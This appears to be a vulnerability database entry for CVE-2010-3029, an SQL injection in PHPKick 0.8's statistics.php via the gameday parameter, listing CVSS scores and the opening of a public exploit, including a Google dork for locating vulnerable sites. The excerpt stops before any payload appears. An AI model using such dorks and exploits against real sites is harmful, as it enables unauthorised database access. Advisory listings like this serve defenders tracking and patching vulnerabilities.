7.5
CVSSv2

CVE-2010-3029

Published: 16/08/2010 Updated: 17/08/2010
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in statistics.php in PHPKick 0.8 allows remote malicious users to execute arbitrary SQL commands via the gameday parameter in an overview action.

Vulnerable Product Search on Vulmon Subscribe to Product

phpkick phpkick 0.8

Exploits

# Exploit Title: PHPKick v08 statisticsphp SQL Injection # Date: August 8th, 2010 # Time: 03:45am ;( # Author: garwga # Version: 08 # Google dork : "© 2004 PHPKickde Version 08" # Category: webapps/0day # Code: see below <?php echo"\n\n"; echo"|=================PHPKick v08 statisticsphp SQL Injection==================|\n"; echo"| ...